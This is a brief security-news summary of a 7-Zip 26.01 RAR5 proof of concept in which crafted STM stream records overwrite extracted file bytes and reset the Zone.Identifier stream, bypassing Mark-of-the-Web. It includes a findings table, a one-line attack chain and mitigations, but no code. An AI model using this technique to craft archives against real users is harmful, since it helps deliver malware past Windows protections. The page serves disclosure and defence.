← Signals
- 7zip
- motw
- windows
- rar5
- exploitarium
news
7-Zip RAR5 MotW/ADS Full-Chain PoC
Crafted RAR5 STM streams overwrite extracted file bytes and Zone.Identifier on 7-Zip 26.01 — MotW bypass chain.
Summary
Crafted RAR5 STM streams overwrite extracted file bytes and Zone.Identifier on 7-Zip 26.01 — MotW bypass chain. This proof-of-concept is one of 30 folders in the Exploitarium collection. OFFSITE.DARK summarizes the upstream README and PoC design; we did not discover or weaponize this flaw.
Key Findings
| Finding | Detail |
|---|---|
| Product / target | 7-Zip 26.01 x64 (Windows NTFS) |
| CVE | Related to MotW/archive handling research (see CVE-2025-0411 class) |
| Primitive | RAR5 ::$DATA and :Zone.Identifier:$DATA STM records |
| Impact | Attacker-controlled visible file content plus ZoneId=0 on extracted files when Internet-zone archive propagates MotW. |
Attack Chain
Build RAR5 → mark archive ZoneId=3 → extract with `-snz1` → verify content + MotW stream
Mitigation
Patch 7-Zip; treat downloaded archives as untrusted; enforce SmartScreen/AppLocker on extracted content.